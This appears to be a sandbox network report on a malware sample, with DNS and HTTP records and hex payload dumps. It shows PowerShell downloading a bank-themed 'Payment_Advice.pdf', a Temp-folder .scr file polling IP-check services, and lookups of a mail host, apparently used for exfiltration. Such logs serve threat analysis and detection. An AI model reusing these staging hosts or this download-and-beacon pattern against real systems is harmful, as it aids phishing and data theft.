Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 1, 2024 15:17:07.035820961 CEST	192.168.2.6	1.1.1.1	0x41fc	Standard query (0)	advising-receipts.com	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.588433981 CEST	192.168.2.6	1.1.1.1	0x9eb2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:26.640476942 CEST	192.168.2.6	1.1.1.1	0xbb68	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:35.775613070 CEST	192.168.2.6	1.1.1.1	0xdeeb	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:50.204247952 CEST	192.168.2.6	1.1.1.1	0x41be	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:15.656567097 CEST	192.168.2.6	1.1.1.1	0xbd3a	Standard query (0)	scratchdreams.tk	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:22.534912109 CEST	192.168.2.6	1.1.1.1	0xc4c2	Standard query (0)	mail.qoldenfrontier.com	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:40.891232014 CEST	192.168.2.6	1.1.1.1	0x7039	Standard query (0)	mail.qoldenfrontier.com	A (IP address)	IN (0x0001)	false
May 1, 2024 15:19:06.547940016 CEST	192.168.2.6	1.1.1.1	0x93ca	Standard query (0)	mail.qoldenfrontier.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 1, 2024 15:17:07.131959915 CEST	1.1.1.1	192.168.2.6	0x41fc	No error (0)	advising-receipts.com		104.21.27.63	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:07.131959915 CEST	1.1.1.1	192.168.2.6	0x41fc	No error (0)	advising-receipts.com		172.67.141.195	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:25.684051991 CEST	1.1.1.1	192.168.2.6	0x9eb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:26.736293077 CEST	1.1.1.1	192.168.2.6	0xbb68	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:26.736293077 CEST	1.1.1.1	192.168.2.6	0xbb68	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:36.137491941 CEST	1.1.1.1	192.168.2.6	0xdeeb	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:36.137491941 CEST	1.1.1.1	192.168.2.6	0xdeeb	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:50.568850994 CEST	1.1.1.1	192.168.2.6	0x41be	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 1, 2024 15:17:50.568850994 CEST	1.1.1.1	192.168.2.6	0x41be	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:15.757297039 CEST	1.1.1.1	192.168.2.6	0xbd3a	No error (0)	scratchdreams.tk		104.21.27.85	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:15.757297039 CEST	1.1.1.1	192.168.2.6	0xbd3a	No error (0)	scratchdreams.tk		172.67.169.18	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:22.776578903 CEST	1.1.1.1	192.168.2.6	0xc4c2	No error (0)	mail.qoldenfrontier.com		108.167.142.65	A (IP address)	IN (0x0001)	false
May 1, 2024 15:18:41.187397957 CEST	1.1.1.1	192.168.2.6	0x7039	No error (0)	mail.qoldenfrontier.com		108.167.142.65	A (IP address)	IN (0x0001)	false
May 1, 2024 15:19:06.714584112 CEST	1.1.1.1	192.168.2.6	0x93ca	No error (0)	mail.qoldenfrontier.com		108.167.142.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

advising-receipts.com

armmf.adobe.com

reallyfreegeoip.org

scratchdreams.tk

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49730	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:25.874871016 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:26.405328035 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
May 1, 2024 15:17:26.420913935 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 1, 2024 15:17:26.598414898 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>
May 1, 2024 15:17:28.575845003 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 1, 2024 15:17:28.728415966 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49733	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:29.425093889 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 1, 2024 15:17:29.616218090 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49735	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:30.575742006 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:30.729648113 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49737	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:31.326097965 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:31.513133049 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49739	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:33.245836020 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:33.690573931 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49741	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:34.299757004 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:34.456650019 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49743	158.101.44.242	80	5648	C:\Windows\Temp\hadvices.scr

Timestamp	Bytes transferred	Direction	Data
May 1, 2024 15:17:35.056392908 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 1, 2024 15:17:35.208826065 CEST	273	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 39 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.96</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	104.21.27.63	443	3532	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 13:17:07 UTC	189	OUT	GET /hsbc/Payment_Advice.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: advising-receipts.com Connection: Keep-Alive
2024-05-01 13:17:07 UTC	651	IN	HTTP/1.1 200 OK Date: Wed, 01 May 2024 13:17:07 GMT Content-Type: application/pdf Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Wed, 01 May 2024 04:21:55 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2Be22JCiWvfXJgiOQCMu2ERhYYIATBNbxJ7rya38k6oVvj6UmGF7b0NjAo7VnDbNEdM3F4hJUFdLMTXRq%2Fy8XB%2FWJK9VZ4KYOV6hBdrTBH6iSJEaXmZGSXZijf%2BEAOy0WviXqoV90a0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d00cca2d618f17-IAD alt-svc: h3=":443"; ma=86400
2024-05-01 13:17:07 UTC	718	IN	Data Raw: 37 64 31 63 0d 0a 25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 50 61 67 65 0d 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 35 20 38 34 32 20 5d 0d 0a 2f 52 65 73 6f 75 72 63 65 73 20 3c 3c 20 2f 58 4f 62 6a 65 63 74 20 3c 3c 20 2f 58 30 20 33 20 30 20 52 20 3e 3e 20 3e 3e 0d 0a 2f 43 6f 6e 74 65 6e 74 73 20 34 20 30 20 52 0d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0d 0a 2f 52 6f 74 61 74 65 20 33 36 30 0d 0a 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 0d 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0d 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0d 0a 2f 57 69 64 74 68 20 32 34 38 30 0d 0a 2f 48 65 69 67 68 74 20 33 35 30 39 0d 0a 2f 42 69 74 73 50 Data Ascii: 7d1c%PDF-1.4%1 0 obj<</Type /Page/MediaBox [ 0 0 595 842 ]/Resources << /XObject << /X0 3 0 R >> >>/Contents 4 0 R/Parent 2 0 R/Rotate 360>>endobj3 0 obj<</Type /XObject/Subtype /Image/Width 2480/Height 3509/BitsP
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fd fc a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?((((((
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: ea fb 2b f6 21 ff 00 82 c9 7e d5 5f b7 97 c3 c8 3c 61 e0 7f d8 96 1b 6f 08 5f f3 67 ac eb df 14 23 d3 6d ef 87 4f dc 24 9a 7f 9b 22 1f f9 e9 1c 7e 5f 5e 68 03 f4 f2 8a f2 df d9 9b c7 5f 12 be 23 78 06 ea f3 e2 8f 80 74 6f 86 de 22 86 fd e2 87 4a d3 7c 49 ff 00 09 04 72 db 88 e3 29 71 f6 8f 22 df 04 b9 90 6c f2 f8 f2 c7 26 bd 4a 80 0a 2b c9 7f 6a 5f 1f 7c 56 f8 77 e1 1d 32 eb e1 4f c3 7d 0f e2 56 b1 2d e7 97 79 63 aa f8 b3 fe 11 d8 ed 61 f2 db f7 82 4f b3 dc 79 9f 3e c1 b3 03 83 d6 be 12 fd b8 3f e0 b6 9f b5 17 fc 13 e3 c1 0b e2 8f 88 5f b1 4c 27 c2 71 ca 23 9f 5c d1 7e 27 c5 a9 59 db b1 ed 37 97 a7 f9 90 7f d7 49 23 08 4e 00 cd 00 7e a3 d1 5f cf cf fc 47 1d 75 ff 00 46 cb 6b ff 00 87 0c ff 00 f2 ba ba 8f 83 df f0 79 4f 8c 3e 3e fc 45 d2 bc 23 e0 9f d9 1e Data Ascii: +!~_<ao_g#mO$"~_^h_#xto"J\|Ir)q"l&J+j_\|Vw2O}V-ycaOy>?_L'q#\~'Y7I#N~_GuFkyO>>E#
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: e4 ff 00 87 db fe d4 1f f4 54 24 ff 00 c1 06 9b ff 00 c6 28 ff 00 87 db fe d3 ff 00 f4 54 64 ff 00 c1 06 9b ff 00 c6 2b 9f fe 22 26 59 fc b3 fb 97 f9 9e e7 fc 49 a7 1c 7f cf dc 3f fe 0c 9f ff 00 2b 3f a1 bd df ed 7e 94 6e ff 00 6b f4 af e7 93 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 1f 6f fb 4f ff 00 d1 51 93 ff 00 04 1a 6f ff 00 18 a3 fe 22 26 59 fc b3 fb 97 f9 8f fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 7b bf da fd 29 37 7f b5 fa 57 f3 cb ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 0f b7 fd a7 ff 00 e8 a8 c9 ff 00 82 0d 37 ff 00 8c 51 ff 00 11 13 2c fe 59 fd cb fc c3 fe 24 d3 8e 3f e7 ed 0f fc 19 3f fe 56 7f 43 58 ff 00 69 7f 2a 00 c1 fb c3 f2 af e7 8f fe 1f 63 fb 4f 1f f9 aa 12 7f e0 83 4d ff 00 e3 15 63 4f Data Ascii: T$(Td+"&YI?+?~nkoOQooOQo"&Y$??VC{)7W7Q7Q,Y$??VCXi*cOMcO
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: 8c fa 86 97 3b db 6a 3a f5 9d a7 87 23 75 ff 00 9e 77 b7 91 5b dc 0f fc 06 79 e8 03 f9 de ff 00 82 e0 7f c1 65 fc 59 ff 00 05 55 fd a3 75 26 b4 be bc d3 fe 10 f8 5e ea 48 fc 27 a1 ee f2 e3 91 3f d5 ff 00 68 5c 27 f1 dc ca 37 7f d7 28 df cb 1f f2 d0 c9 ef df f0 40 af f8 37 30 ff 00 c1 45 fc 37 0f c5 af 8b 57 da 96 83 f0 95 6e de 0d 33 4e b2 60 97 be 2b 78 a4 d9 27 ef 71 fb 9b 61 26 63 2f fe b2 43 e6 04 31 ec 12 57 e4 8d 7f 6f 3f f0 4a ef 0d e8 de 16 ff 00 82 6b fc 01 b4 f0 ff 00 97 fd 8f 1f c3 ed 12 48 1d 17 fd 6f 99 65 14 8f 27 fd b4 77 2f f5 34 01 7f f6 71 ff 00 82 71 7c 07 fd 92 f4 3b 7d 3b e1 ef c2 5f 01 f8 69 6d 53 cb fb 4c 1a 44 72 de ca 0f fc f4 b8 90 3d c4 9f f6 d2 43 5d 77 c5 df d9 5f e1 9f ed 01 e1 f6 d2 7c 71 f0 f7 c1 3e 2c d3 64 5d 82 df 56 d1 Data Ascii: ;j:#uw[yeYUu&^H'?h\'7(@70E7Wn3N`+x'qa&c/C1Wo?JkHoe'w/4qq\|;};_imSLDr=C]w_\|q>,d]V
2024-05-01 13:17:07 UTC	1369	IN	Data Raw: bf f0 75 c7 ed 89 e1 1f 83 93 f8 3d bc 59 e1 7d 4b 51 30 fd 9e 2f 12 5f 68 11 cb ad 5a 8e 99 07 3f 67 79 38 fb f2 c3 27 e7 5f a8 1f f0 66 8f c4 1d 4b c6 ff 00 b1 0f c6 09 b5 6b eb ad 4b 52 ba f8 97 71 aa dd 5c 5d 48 65 92 e2 7b 8d 3e cb cc 91 e4 3f 7d dc a6 79 fa f7 af 33 ff 00 83 a3 7f e0 84 9a 57 89 bc 13 af 7e d3 5f 09 34 58 74 cd 6b 45 8d ef fc 79 a3 da c7 e5 c3 aa db e3 32 6a b1 a0 e9 71 1f 2f 71 ff 00 3d 23 fd e7 12 47 21 97 5b fe 0c 89 d6 7e d5 fb 35 7c 74 b1 ff 00 9f 5f 13 69 f3 ff 00 df cb 69 07 fe d3 a0 0f dc 4a 28 a2 80 0a 0d 19 a0 9e 28 02 bc 92 73 db 76 38 1e 94 d4 7f 31 47 dd 61 dc e2 87 40 fd b0 18 72 7d ab f3 8f fe 0a fb ff 00 05 79 87 f6 7b b3 bf f8 6b f0 d6 f9 66 f1 c5 c2 18 f5 1d 4e 03 e6 47 a0 c7 fd c5 c7 59 cf a7 f0 75 35 c1 99 66 54 Data Ascii: u=Y}KQ0/_hZ?gy8'_fKkKRq\]He{>?}y3W~_4XtkEy2jq/q=#G![~5\|t_iiJ((sv81Ga@r}y{kfNGYu5fT
